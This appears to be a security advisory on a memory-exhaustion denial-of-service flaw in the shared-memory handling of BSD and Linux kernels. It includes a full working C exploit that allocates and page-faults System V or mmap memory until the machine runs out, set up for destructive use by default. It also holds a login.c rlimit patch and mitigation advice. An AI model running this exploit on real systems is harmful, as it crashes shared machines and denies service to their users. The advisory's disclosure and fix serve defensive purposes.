COMMAND
Shared memory (IPC)
SYSTEMS AFFECTED
Most BSD kernels
PROBLEM
Mike Perry posted the following. While fiddling with various IPC
mechanisms and reading The Design and Implementation of 4.4BSD, a
few things struck him as potentially dangerous. According
to the book, when you request a shared memory segment via mmap(),
the file isn't actually physically in memory until you start to
trigger page faults and cause the vnode-pager to page in the data
from the file. Then, the following passage from shmctl(2) under
Linux caught his eye: "The user must ensure that a segment is
eventually destroyed; otherwise its pages that were faulted in
will remain in memory or swap."
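The lazy behaviour described above can be observed safely on a small
scale. The following is a minimal sketch, not part of Mike's program:
it maps /dev/zero privately (the same trick the exploit below uses),
writes one byte per page, and reports how many minor page faults the
writes caused. The helper name count_touch_faults is hypothetical,
and the fault counter comes from getrusage(), which some systems may
not fill in.

```c
#include <stddef.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>

/* Hypothetical helper: map npages of zero-filled memory, write one byte
 * to each page, and return how many minor page faults the writes caused.
 * Returns -1 if the mapping could not be created. */
long count_touch_faults(size_t npages)
{
    struct rusage before, after;
    long pagesz = sysconf(_SC_PAGESIZE);
    size_t len = npages * (size_t)pagesz;
    size_t off;
    char *p;
    int fd;

    fd = open("/dev/zero", O_RDWR);
    if (fd == -1)
        return -1;
    p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    close(fd);                      /* the mapping outlives the descriptor */
    if (p == MAP_FAILED)
        return -1;

    /* The mapping exists now, but no physical page backs it yet. */
    getrusage(RUSAGE_SELF, &before);
    for (off = 0; off < len; off += (size_t)pagesz)
        p[off] = '*';               /* first write faults the page in */
    getrusage(RUSAGE_SELF, &after);

    munmap(p, len);
    return after.ru_minflt - before.ru_minflt;
}
```

Calling count_touch_faults(64) on a system that reports minor faults
should return a value close to the number of pages touched, which is
the cost the mmap() call itself never paid.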
So it turns out that it is in fact possible to create a DoS
condition by requesting a truckload of shared memory and then
triggering page faults across the entire shared region. The end
result is no different from a simple fork or malloc bomb, but it is
considerably harder to prevent on most systems. This is mainly
because:
1. The system does not check rlimits for mmap and shmget
(FreeBSD)
2. The system never bothers to offer the ability to set the
rlimits for virtual memory via shells, login process, or
otherwise. (Linux)
3. a. The system does not watch to make sure you don't share
more memory than exists. (Linux, Irix, BSD?)
b. The system does not actually allocate shared memory
until a page fault is triggered (this could be argued to
be a feature - Linux, *BSD)
4. With System V IPC, shared memory persists even after the
process is gone. So even though the kernel may kill the
process after it exhausts all memory from page faults,
there is still no memory left for the system. (I suppose
that with some trickery you might be able to achieve the
same results by shared mmap()'ing a few large files between
pairs of processes.) (All)
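Point 4 is what the shmctl(2) passage quoted earlier warns about. A
well-behaved program can avoid leaving segments behind by marking the
segment for removal as soon as it is attached. The sketch below shows
one way to do that; attach_transient_segment is a hypothetical name,
and the code assumes a system where a segment marked with IPC_RMID
stays usable until its last detach.

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

/* Hypothetical helper: create a private segment, attach it, and mark it
 * for removal right away so the kernel frees it on the last detach.
 * Returns the attached address, or NULL on failure. */
void *attach_transient_segment(size_t size)
{
    void *addr;
    int shmid = shmget(IPC_PRIVATE, size, IPC_CREAT | 0600);

    if (shmid == -1)
        return NULL;

    addr = shmat(shmid, NULL, 0);

    /* Mark for removal whether or not the attach worked, so that a
     * failed attach does not leave an orphaned segment behind. */
    shmctl(shmid, IPC_RMID, NULL);

    return addr == (void *)-1 ? NULL : addr;
}
```

The caller releases the memory with shmdt() as usual. If the process
is killed instead, the segment is detached on exit and goes away with
it, which is exactly what does not happen in the attack.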
Mike attached a program that will exploit these conditions using
either shmget(), mmap(), or by getting malloc to mmap() (those are
in order of effectiveness). This program should compile on any
architecture. SGI Irix is not vulnerable. Reading The Design
and Implementation of 4.4BSD, it sounds as if the BSDs should all
be vulnerable. FreeBSD will mmap as much memory as you tell it.
Note that Mike posted the wrong file: its default attack is
__FUXX0R_MMAP__. He meant to post one that had the default attack
of __FUXX0R_SYSV__, and with __REALLY_FUXX0R__ undefined (so the
program wouldn't actually page fault and kill your system, if you
just wanted to see if limits would kick in). Please change these
before running the exploit. System V IPC is where the real kernel
crusher is.
It seems that OpenBSD 2.5-current (Jul 3) is vulnerable. The
place to check if you're vulnerable is sys/resource.h, or if
you're on BSD and have kernel source, checking sys/vm/vm_mmap.c
for an RLIMIT other than STACK should let you know. The proper way
to fix this is to have a separate limit for address space or
virtual memory. Solaris has both (probably since their malloc uses
both brk and mmap, and the virtual memory limit is for stopping
malloc bombs).
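The sys/resource.h check can also be done from a program rather than
by reading the header. The following sketch compiles differently
depending on which limit the headers define, and reports the current
value. The helper name query_address_space_limit and the macro
ADDRESS_SPACE_LIMIT are made up for this example. A defined limit
only shows that the kernel offers the knob, not that mmap() and
shmget() honour it.

```c
#include <sys/time.h>
#include <sys/resource.h>

/* Pick whichever address-space limit this platform's headers define. */
#if defined(RLIMIT_AS)
# define ADDRESS_SPACE_LIMIT RLIMIT_AS
#elif defined(RLIMIT_VMEM)
# define ADDRESS_SPACE_LIMIT RLIMIT_VMEM
#endif

/* Hypothetical helper.  Returns 1 and fills *out if an address-space
 * limit exists, 0 if the headers define none, -1 if getrlimit() fails. */
int query_address_space_limit(struct rlimit *out)
{
#ifdef ADDRESS_SPACE_LIMIT
    return getrlimit(ADDRESS_SPACE_LIMIT, out) == 0 ? 1 : -1;
#else
    (void)out;
    return 0;
#endif
}
```

A return value of 0 means there is nothing to set at all. A return
value of 1 with out->rlim_cur equal to RLIM_INFINITY means the limit
exists but nobody has set it for this process.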
/*
* This program can be used to exploit DoS bugs in the VM systems or utility
* sets of certain OS's.
*
* Common problems:
* 1. The system does not check rlimits for mmap and shmget (FreeBSD)
* 2. The system never bothers to offer the ability to set the rlimits for
* virtual memory via shells, login process, or otherwise. (Linux)
* 3. a. The system does not watch to make sure you don't share more memory
* than exists. (Linux, Irix, BSD?)
* b. The system does not actually allocate shared memory until a page fault
* is triggered (this could be argued to be a feature - Linux, *BSD)
* 4. With System V IPC, shared memory persists even after the process is
* gone. So even though the kernel may kill the process after it exhausts all
* memory from page faults, there still is 0 memory left for the system.
* (All)
*
* This program should compile on any architecture. SGI Irix is not
* vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
* as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
* as you tell it. I haven't tried page faulting the memory, as the system is
* not mine. I'd be very interested to hear about OpenBSD...
*
* This program is provided for vulnerability evaluation ONLY. DoS's aren't
* cool, funny, or anything else. Don't use this on a machine that isn't
* yours!!!
*/
#include <stdio.h>
#include <stdlib.h> /* malloc, free, exit, strtol */
#include <string.h> /* strcmp */
#include <unistd.h> /* close */
#include <errno.h>
#include <sys/ipc.h>
#include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
#ifdef __linux__
#include <asm/shmparam.h>
#include <asm/page.h>
#endif
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h> /* open, O_RDWR */
#include <sys/mman.h>
int len;
#define __FUXX0R_MMAP__
/* mmap also implements the copy-on-fault mechanism, but because the only way
* to easily exploit this is to use anonymous mappings, once the kernel kills
* the offending process, you can recover. (Although swap death may still
* occur.) */
/* #define __FUXX0R_MMAP__ */
/* Most mallocs use mmap to allocate large regions of memory. */
/* #define __FUXX0R_MMAP_MALLOC__ */
/* Guess what this option does :) */
#define __REALLY_FUXX0R__
/* From glibc 2.1.1 malloc/malloc.c */
#define DEFAULT_MMAP_THRESHOLD (128 * 1024)
#ifndef PAGE_SIZE
# define PAGE_SIZE 4096
#endif
#ifndef SHMSEG
# define SHMSEG 256
#endif
#if defined(__FUXX0R_MMAP_MALLOC__)
void *mymalloc(int n)
{
if(n <= DEFAULT_MMAP_THRESHOLD)
n = DEFAULT_MMAP_THRESHOLD + 1;
return malloc(n);
}
void myfree(void *buf)
{
free(buf);
}
#elif defined(__FUXX0R_MMAP__)
void *mymalloc(int n)
{
int fd;
void *ret;
fd = open("/dev/zero", O_RDWR);
ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
close(fd);
return (ret == (void *)-1 ? NULL : ret);
}
void myfree(void *buf)
{
munmap(buf, len);
}
#elif defined(__FUXX0R_SYSV__)
void *mymalloc(int n)
{
char *buf;
static int i = 0;
int shmid;
i++; /* 0 is IPC_PRIVATE */
if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
{
#if defined(__irix__)
if (shmctl (shmid, IPC_RMID, NULL))
{
perror("shmctl");
}
#endif
return NULL;
}
if((buf = shmat(shmid, 0, 0)) == (char *)-1)
{
#if defined(__irix__)
if (shmctl (shmid, IPC_RMID, NULL))
{
perror("shmctl");
}
#endif
return NULL;
}
#ifndef __REALLY_FUXX0R__
if (shmctl (shmid, IPC_RMID, NULL))
{
perror("shmctl");
}
#endif
return buf;
}
void myfree(void *buf)
{
shmdt(buf);
}
#endif
#ifdef __linux__
void cleanSysV()
{
struct shmid_ds shmid;
struct shm_info shm_info;
int id;
int maxid;
int ret;
int shid;
maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
printf("maxid %d\n", maxid);
for (id = 0; id <= maxid; id++)
{
if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
continue;
if (shmctl (shid, IPC_RMID, NULL))
{
perror("shmctl");
}
printf("id %d has %d attachments\n", shid, (int)shmid.shm_nattch);
shmid.shm_nattch = 0;
shmctl(shid, IPC_SET, &shmid);
if(shmctl(shid, SHM_STAT, &shmid) < 0)
{
printf("id %d deleted successfully\n", shid);
}
else if(shmid.shm_nattch == 0)
{
printf("Still able to stat id %d, but has no attachments\n", shid);
}
else
{
printf("Error, failed to remove id %d!\n", shid);
}
}
}
#endif
int main(int argc, char **argv)
{
int shmid;
int i = 0;
char *buf[SHMSEG * 2];
int max;
int offset;
if(argc < 2)
{
printf("Usage: %s <[0x]size of segments>\n", argv[0]);
#ifdef __linux__
printf(" or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
#endif
exit(0);
}
#ifdef __linux__
if(!strcmp(argv[1], "--clean"))
{
cleanSysV();
exit(0);
}
#endif
len = strtol(argv[1], NULL, 0);
for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
;
max = i;
perror("Stopped because");
printf("Maxed out at %d %d byte segments\n", max, len);
#if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
"size: %d), \n", SHMMNI, SHMSEG, SHMMAX, PAGE_SIZE);
#endif
#ifdef __REALLY_FUXX0R__
fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
for(i = 0; i < max; i++)
{
for(offset = 0; offset < len; offset += PAGE_SIZE)
{
buf[i][offset] = '*';
}
printf("wrote to %d bytes of memory, final offset %d\n", len, offset);
}
// never reached :(
#else
for(i = 0; i < max; i++) /* buf[max] is the failed (NULL) slot, not a mapping */
{
myfree(buf[i]);
}
#endif
exit(42);
}
For people who used small segment sizes and caused the program to
segfault: this is because the default attack is mmap, and you can
do an effectively unlimited number of private mmapings. The
program uses an array of pointers to keep track of the memory so
that it can free it when the __REALLY_FUXX0R__ option isn't set,
so with small segments you overrun your own buffer. The buffer
size is 2 times the per-process limit for SysV IPC shares, so the
buffer will not be overrun with that attack.
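One way to avoid the overrun is to test the array bound before every
store instead of after it. The sketch below is an illustration, not
a patch to the program above: fill_segments is a hypothetical helper,
and it takes the allocator as a function pointer with a size_t
argument, whereas the program's mymalloc() takes an int.

```c
#include <stddef.h>
#include <stdlib.h>   /* malloc, for the usage shown below */

/* Hypothetical helper: fill buf[0..cap-1] using alloc() and return how
 * many slots were filled.  The bound is tested before each store, so buf
 * is never written past its end however many allocations would succeed. */
int fill_segments(void **buf, int cap, size_t len, void *(*alloc)(size_t))
{
    int i;

    for (i = 0; i < cap; i++) {
        buf[i] = alloc(len);
        if (buf[i] == NULL)
            break;          /* allocator gave up; buf[i] is not valid */
    }
    return i;
}
```

With a four-entry array, fill_segments(b, 4, 16, malloc) returns 4
and leaves exactly four pointers to free. The return value plays the
role of max in the program above.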
SOLUTION
Below is a patch to util-linux-2.9o login.c (and pathnames.h) that
provides a means under Linux (should be pretty portable to other
OS's) to set the address space limit (RLIMIT_AS: the rlimit that
controls how much data you can actually map into your process).
The patch is based on an old program called lshell that set limits
by wrapping your shell. Sample /etc/limits file:
# Limit the user guest to 5 minutes CPU time and 8 procs, 5Mb address space
guest C5P8V5D2
# 60 min's CPU time, 30 procs, 15Mb data, 50 megs total address space, 5 megs
# stack, 15 megs of RSS.
default C60P30D15V50S5R15
At the very least, a line of the form default V<size of physical
memory> is recommended. You can use lowercase letters for the next
lowest order of magnitude of units. The comment in the patch
explains it in further detail. Note that even in this case, a
determined user can probably just log in a dozen or so times and
use SysV IPC to steal the system memory.
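To make the format of the limit strings concrete, here is a small
decoder that only computes values and never calls setrlimit(). It is
a sketch written for this explanation, not code from the patch, and
limit_value is a hypothetical name. It follows the letter table in
the patch comment: F and P are plain counts, C is minutes and c is
seconds, and the memory letters are megabytes in upper case and
kilobytes in lower case.

```c
#include <ctype.h>
#include <stdlib.h>

/* Hypothetical helper: look up one limit in a spec such as "C60P30V50".
 * key is the upper-case letter of the limit wanted.  Returns the value in
 * base units (seconds, bytes, or a plain count), or -1 if it is absent. */
long long limit_value(const char *spec, char key)
{
    const char *p = spec;

    while (*p != '\0') {
        char letter = *p++;
        char *end;
        long n;
        long long scale = 1;

        if (!isalpha((unsigned char)letter))
            continue;
        n = strtol(p, &end, 10);    /* digits that follow the letter */
        p = end;
        if (toupper((unsigned char)letter) != key)
            continue;

        if (key == 'C')                     /* C: minutes, c: seconds */
            scale = isupper((unsigned char)letter) ? 60 : 1;
        else if (key != 'F' && key != 'P')  /* memory: megs or kbs */
            scale = isupper((unsigned char)letter) ? 1024LL * 1024 : 1024;
        return n * scale;
    }
    return -1;
}
```

For the guest line above, limit_value("C5P8V5D2", 'C') gives 300
seconds and limit_value("C5P8V5D2", 'V') gives 5 * 1024 * 1024 bytes.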
diff -ur ./util-linux-2.9o/lib/pathnames.h ./util-linux-2.9o-mp/lib/pathnames.h
--- ./util-linux-2.9o/lib/pathnames.h Sun Oct 11 14:19:16 1998
+++ ./util-linux-2.9o-mp/lib/pathnames.h Wed Jul 14 22:51:13 1999
@@ -86,6 +86,7 @@
#define _PATH_SECURE "/etc/securesingle"
#define _PATH_USERTTY "/etc/usertty"
+#define _PATH_LIMITS "/etc/limits"
#define _PATH_MTAB "/etc/mtab"
#define _PATH_UMOUNT "/bin/umount"
diff -ur ./util-linux-2.9o/login-utils/login.c ./util-linux-2.9o-mp/login-utils/login.c
--- ./util-linux-2.9o/login-utils/login.c Sat Mar 20 14:20:16 1999
+++ ./util-linux-2.9o-mp/login-utils/login.c Wed Jul 14 22:49:24 1999
@@ -185,6 +185,7 @@
char *stypeof P_((char *ttyid));
void checktty P_((char *user, char *tty, struct passwd *pwd));
void sleepexit P_((int eval));
+void setup_limits P_((struct passwd *pwd));
#ifdef CRYPTOCARD
int cryptocard P_((void));
#endif
@@ -1110,6 +1111,8 @@
childArgv[childArgc++] = NULL;
+ setup_limits(pwd);
+
execvp(childArgv[0], childArgv + 1);
if (!strcmp(childArgv[0], "/bin/sh"))
@@ -1120,6 +1123,161 @@
exit(0);
}
+
+/* Most of this code ripped from lshell by Joel Katz */
+void process(char *buf)
+{
+ /* buf is of the form [Fn][Pn][Ct][Vm][Sm][Rm][Lm][Dm] where */
+ /* F specifies n max open files */
+ /* P specifies n max procs */
+ /* c specifies t seconds of cpu */
+ /* C specifies t minutes of cpu */
+ /* v specifies m kbs of total virtual memory (address space) */
+ /* V specifies m megs of total virtual memory (address space) */
+ /* s specifies m kbs of stack */
+ /* S specifies m megs of stack */
+ /* r specifies m kbs of RSS */
+ /* R specifies m megs of RSS */
+ /* l specifies m kbs of locked (non-swappable) memory */
+ /* L specifies m megs of locked (non-swappable) memory */
+ /* d specifies m kbs of Data segment */
+ /* D specifies m megs of Data segment */
+
+ struct rlimit rlim;
+ char *pp = buf;
+ int i;
+
+ while(*pp!=0)
+ {
+ i = 1;
+ switch(*pp++)
+ {
+ case 'f':
+ case 'F':
+ i = atoi(pp);
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_NOFILE, &rlim);
+ break;
+ case 'p':
+ case 'P':
+ i = atoi(pp);
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_NPROC, &rlim);
+ break;
+ case 'C':
+ i = 60;
+ case 'c':
+ i *= atoi(pp);
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_CPU, &rlim);
+ break;
+ case 'V':
+ i = 1024;
+ case 'v':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+#if defined(RLIMIT_AS) /* Linux */
+ setrlimit(RLIMIT_AS, &rlim);
+#elif defined(RLIMIT_VMEM) /* Irix */
+ setrlimit(RLIMIT_VMEM, &rlim);
+#endif
+ break;
+ case 'S':
+ i = 1024;
+ case 's':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_STACK, &rlim);
+ break;
+ case 'R':
+ i = 1024;
+ case 'r':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_RSS, &rlim);
+ break;
+ case 'L':
+ i = 1024;
+ case 'l':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_MEMLOCK, &rlim);
+ break;
+ case 'D':
+ i = 1024;
+ case 'd':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_DATA, &rlim);
+ break;
+ }
+ }
+}
+
+void setup_limits(struct passwd *pw)
+{
+ FILE *fp;
+ int i;
+ char buf[200], name[20], limits[64];
+ char *p;
+
+ if(pw->pw_uid == 0)
+ {
+ return;
+ }
+
+ if((fp = fopen(_PATH_LIMITS,"r")) == NULL)
+ {
+ return;
+ }
+
+ while(fgets(buf, 200, fp) != NULL)
+ {
+ if(buf[0] == '#')
+ continue;
+
+ p = strchr(buf, '#');
+ if(p)
+ *p = 0;
+
+ i=sscanf(buf, "%s %s", name, limits);
+
+ if(!strcmp(name, pw->pw_name))
+ {
+ if(i==2)
+ process(limits);
+ fclose(fp);
+ return;
+ }
+ }
+ fclose(fp);
+ process(limits); /* Last line is default */
+}
+
void
getloginname()
SysVinit (>2.54) uses /etc/initscript (or /sbin/initscript) to
spawn the processes listed in /etc/inittab, so you can set limits
within that (e.g. for the getty processes). Either wrap
in.telnetd or use -L to wrap the login program. Set limits in
the rc.init2 (etc) script for daemons which may execute
user-defined code (e.g. crond, httpd). Similarly for xdm via
Xstartup. You might also want to wrap your MDAs if you are using
procmail or allow program aliases in ~/.forward files.
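The wrapping approach mentioned above comes down to setting the limit
and then exec'ing the real program, since rlimits are inherited
across exec. The following is a minimal sketch under that
assumption. The name run_with_as_limit is hypothetical, and unlike a
real wrapper it forks first so that the caller can see the exit
status; a wrapper for in.telnetd or login would set the limit and
exec directly.

```c
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run argv[0] with its address space capped at
 * `bytes`.  Returns the child's exit status, or -1 on failure. */
int run_with_as_limit(rlim_t bytes, char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid == -1)
        return -1;

    if (pid == 0) {
        struct rlimit rl;

        rl.rlim_cur = bytes;
        rl.rlim_max = bytes;
#if defined(RLIMIT_AS)              /* Linux */
        if (setrlimit(RLIMIT_AS, &rl) == -1)
            _exit(126);
#elif defined(RLIMIT_VMEM)          /* Irix, System V */
        if (setrlimit(RLIMIT_VMEM, &rl) == -1)
            _exit(126);
#else
        (void)rl;                   /* no address-space limit available */
#endif
        execvp(argv[0], argv);      /* the limit survives the exec */
        _exit(127);                 /* only reached if exec failed */
    }

    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

For example, passing the argument vector { "sh", "-c", "exit 0", NULL }
with a 512 megabyte cap should return 0, while a program that tries
to map more than the cap should see its allocations fail on systems
that enforce the limit.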
You have to use PAM, Sys V init, or the patch. Lshell does not set
the RLIMIT_AS limit either, so you have to patch it as well. After
more research, it seems that System V implements RLIMIT_VMEM to
stop people from exploiting this problem, but apparently when BSD
implemented the Sys V IPC, they neglected to add an appropriate
RLIMIT.